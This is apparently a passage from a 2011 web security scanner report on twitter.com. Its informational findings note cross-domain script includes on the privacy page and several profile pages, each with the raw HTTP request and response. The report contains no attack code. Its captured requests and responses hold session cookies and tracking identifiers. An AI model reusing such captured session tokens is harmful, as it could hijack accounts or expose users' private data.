Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6DGNzcmZfaWQiJWU5MTJmOTE0MDVh%250AYTQ5NTFjYzcyZmVlZDYwMDAwYjVmOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--a5d425c05ed0a2c47b3ad4f3d88984c56bb1b3bb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.524. http://twitter.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:33:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225207-26457-5034
ETag: "698a31e98a86756a2e7c5d6c189279a5"
Last-Modified: Fri, 28 Jan 2011 14:33:27 GMT
X-Runtime: 0.04616
Content-Type: text/html; charset=utf-8
Content-Length: 18931
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2I4YmEyNmNmNGJiZWU4OTQwZjQzMmI3Yjc1ZWY1%250ANmE6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--6505c9c812096e5cf60081e8a28d63744411389b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.525. http://twitter.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:13:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234782-88353-14797
ETag: "a0df28720bf78ccb1c59725c49be6ba0"
Last-Modified: Fri, 28 Jan 2011 17:13:02 GMT
X-Runtime: 0.04175
Content-Type: text/html; charset=utf-8
Content-Length: 18801
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.526. http://twitter.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225080-72692-36002
ETag: "728deff396f751fb7d15a00d76938c97"
Last-Modified: Fri, 28 Jan 2011 14:31:20 GMT
X-Runtime: 0.03526
Content-Type: text/html; charset=utf-8
Content-Length: 18932
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNGY1MzgyYzMzYTg4Mzg2YTMzY2RlZDc2NjAwMDli%250AMzM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--0d04f4b19d1ef9fb4248b979f81a1df77a504fb3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.527. http://twitter.com/rachbarnhart previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rachbarnhart

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-44205-8520
ETag: "2d3e9ea7bdf09844d1aed67d3b8c66fc"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01426
Content-Type: text/html; charset=utf-8
Content-Length: 52627
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.528. http://twitter.com/rachbarnhart previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rachbarnhart

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234661-73856-26288
ETag: "d7837c8cf77c291ae00db7181d2c78ea"
Last-Modified: Fri, 28 Jan 2011 17:11:01 GMT
X-Runtime: 0.05064
Content-Type: text/html; charset=utf-8
Content-Length: 52669
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.529. http://twitter.com/rem previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rem

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-70162-12873
ETag: "f1048f44c2dbfae0ca279695ab2f56e2"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.00958
Content-Type: text/html; charset=utf-8
Content-Length: 54681
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.530. http://twitter.com/rickrussie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rickrussie

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234600-40167-24982
ETag: "7aa27a473c1875804f64ad53fb802d06"
Last-Modified: Fri, 28 Jan 2011 17:10:00 GMT
X-Runtime: 0.01367
Content-Type: text/html; charset=utf-8
Content-Length: 51512
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
